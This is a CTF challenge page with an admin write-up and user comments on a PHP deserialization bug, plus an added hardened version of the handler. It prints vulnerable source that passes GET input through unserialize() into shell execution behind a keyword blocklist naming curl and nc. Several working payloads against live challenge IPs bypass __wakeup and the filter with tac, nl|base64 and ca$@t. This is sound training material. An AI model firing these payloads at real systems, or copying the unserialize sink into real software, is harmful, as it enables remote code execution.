

Consolation Prize

Platform: WEB   Passed

Challenge author: harry

First blood: dotast

First blood reward: 2 gold coins

Solved: 1746

Hint:

Description: flag{}

Admin's write-up:

1. View the page source. It contains a base64 string; decoding it with echo 'YmFja3Vwcw==' | base64 -d gives backups.
2. Directory scan with dirsearch -u http://114.67.175.224:19177/ turns up flag.php and index.php.bak.
3. flag.php produces no output. Download index.php.bak; its source is:

<?php

header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
        }else
        {
            echo "</br>给你个安慰奖吧,hhh!</br>";
            die();
        }
    }
}
$select = $_GET['code'];
$res = unserialize(@$select);
?>

4. Code audit: the unserialize() call on user input is a PHP deserialization vulnerability. Build the payload:

$a = new ctf('admin', 'tac flag.php');  $code = serialize($a);

/?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac%20flag.php";}

Visit that URL to get the flag.
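For contrast, here is an added example (not the challenge's or the author's code) of how the same handler would look without the unserialize($_GET['code']) sink: either refuse to instantiate any class, or drop native serialization for JSON plus a fixed allowlist. The action names in the allowlist are hypothetical.

```php
<?php
// Added example, not the challenge's code: two ways to remove the
// unserialize($_GET['code']) sink from index.php.bak while keeping a
// "run a chosen command" feature.

// 1. If serialized input genuinely must be accepted, forbid every class.
//    Objects decode to __PHP_Incomplete_Class, whose __wakeup() and
//    __destruct() never run, so the ctf gadget cannot execute anything.
//    (PHP 5.6.25 / 7.0.10 and later also skip __destruct() when the declared
//    property count does not match, which defeats the count trick in step 4.)
function safe_unserialize(string $blob)
{
    $value = unserialize($blob, ['allowed_classes' => false]);
    if ($value === false || $value instanceof __PHP_Incomplete_Class) {
        error_log('rejected serialized object in code parameter'); // detection hook
        return null;
    }
    return $value;
}

// 2. Preferred: no native serialization at all. Accept JSON, validate the
//    shape, and let the client pick a key whose value is a fixed command.
//    The action names are hypothetical; only these constants reach the shell.
const ALLOWED_ACTIONS = ['whoami' => 'whoami', 'uptime' => 'uptime'];

function handle_request(string $json): string
{
    try {
        $req = json_decode($json, true, 512, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        return 'bad request';
    }
    if (!is_array($req) || !isset($req['action']) || !is_string($req['action'])) {
        return 'bad request';
    }
    if (!array_key_exists($req['action'], ALLOWED_ACTIONS)) {
        return 'unknown action';
    }
    $out = shell_exec(ALLOWED_ACTIONS[$req['action']]);
    return is_string($out) ? $out : '';
}

// Constructed input: the write-up's payload (protected names carry \0*\0).
$p = "\0*\0";
$payload = 'O:3:"ctf":3:{s:11:"' . $p . 'username";s:5:"admin";s:6:"' . $p . 'cmd";s:12:"tac flag.php";}';
var_dump(safe_unserialize($payload));                  // NULL, nothing executed
var_dump(handle_request('{"action":"tac flag.php"}')); // "unknown action"
```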

Bojing @ 2024-05-07 23:21:25 👍0

Where does it hint that username is admin?


numberone @ 2024-06-02 23:21:25 👍0

Isn't there an if statement in the source: if ($this->username === 'admin')


18956160518 @ 2024-03-07 23:21:25 👍0

https://blog.csdn.net/m0_57954651/article/details/127866733


EtHat @ 2023-12-07 23:21:25 👍0

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}


xht0525 @ 2023-10-07 23:21:25 👍0

nl flag.php|base64


不会编程的崽 @ 2023-10-07 23:21:25 👍0

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>


不会编程的崽 @ 2023-10-07 23:21:25 👍0

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}


c41vin @ 2023-06-07 23:21:25 👍0

0. The code is in index.php.bak; 1. change the property count after serialization (anything larger than 2 works) to bypass __wakeup(); 2. note that protected properties get %00 before and after the * once serialized; 3. use tac to bypass the cat filter; 4. payload: index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6


wxy1343 @ 2023-06-07 23:21:25 👍0

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}


wxy1343 @ 2023-06-07 23:21:25 👍0

flag{Unser1alize_and_2CE_Add}


yuanyipaceandlove @ 2023-06-07 23:21:25 👍0

<?php class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a; ?>